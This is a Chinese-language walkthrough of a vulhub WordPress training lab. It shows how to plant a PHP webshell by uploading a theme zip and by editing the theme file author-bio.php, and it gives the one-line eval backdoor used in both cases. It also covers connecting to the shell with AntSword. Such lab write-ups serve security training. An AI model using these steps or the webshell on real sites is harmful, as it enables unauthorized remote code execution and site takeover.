当前位置: 首页 > article >正文

vulhub-wordpress靶场

一.主题上传漏洞

来到靶场点击主题选择add new

这里有一个上传主题的地方

我们可以去网上找到wordpress主题下载一个

wordpress模板 网页设计模板 免费 免费下载 - 爱给网

下载完成后对我们有用的东西只有这一个目录,把它拖出来

点开moban目录后,创建一个php文件,写一个一句话木马

将这个目录改名为moban并且压缩

去上传

上传成功,我们去搜一下这个cms类型的绝对路径

搜索:wordpress主题上传的路径wp-content/themes/

我们去访问一下这个文件

用蚁剑连接一下

连接成功

二.编辑文件漏洞

来到主题,选择editor再选择author-bio.php

将里面的内容改为一句话木马

全部删除改为:<?php @eval($_POST['c']); ?>

改完之后记得提交

这里就是他的路径,试着访问一下,显示not found

我们把Twenty Fifteen改为twentyfifteen

发现访问到了,去用蚁剑连接一下,连接成功


http://www.kler.cn/a/457847.html

相关文章:

  • Elasticsearch: 高级搜索
  • 从摩托罗拉手机打印短信的简单方法
  • Java重要面试名词整理(十八):Sentinel
  • xdoj 有序数列插值
  • 大模型系列——旋转位置编码和长度外推
  • ASP.NET CORE 依赖注入的三种方式,分别是什么,使用场景
  • 区块链安全常见的攻击合约和简单复现,附带详细分析——不安全调用漏洞 (Unsafe Call Vulnerability)【6】
  • 【513. 找树左下角的值 中等】
  • 【Leetcode刷题随笔】977 有序数组的平方
  • google广告 google分析
  • wordpress woodmark max_input_vars = 1000 限制问题
  • 使用proxysql代理mysql连接
  • 【Raven1靶场渗透】
  • 钱币找零.
  • 秒鲨后端之MyBatis【1】环境的搭建和核心配置文件详解(重置)
  • 智能工厂的设计软件 应用场景的一个例子:为AI聊天工具添加一个知识系统 之5
  • vue.js普通组件的注册-全局注册
  • 7-Gin 中自定义控制器 --[Gin 框架入门精讲与实战案例]
  • CPU性能优化--后端优化
  • upload-labs关卡记录5
  • 【论文笔记】Contrastive Learning for Sign Language Recognition and Translation
  • 云计算时代携程的网络架构变迁
  • vulnhub jangow靶机
  • 《云计算能不能真正实现按需付费?》
  • unplugin-vue-router 的基本使用
  • 机器学习周报-TCN文献阅读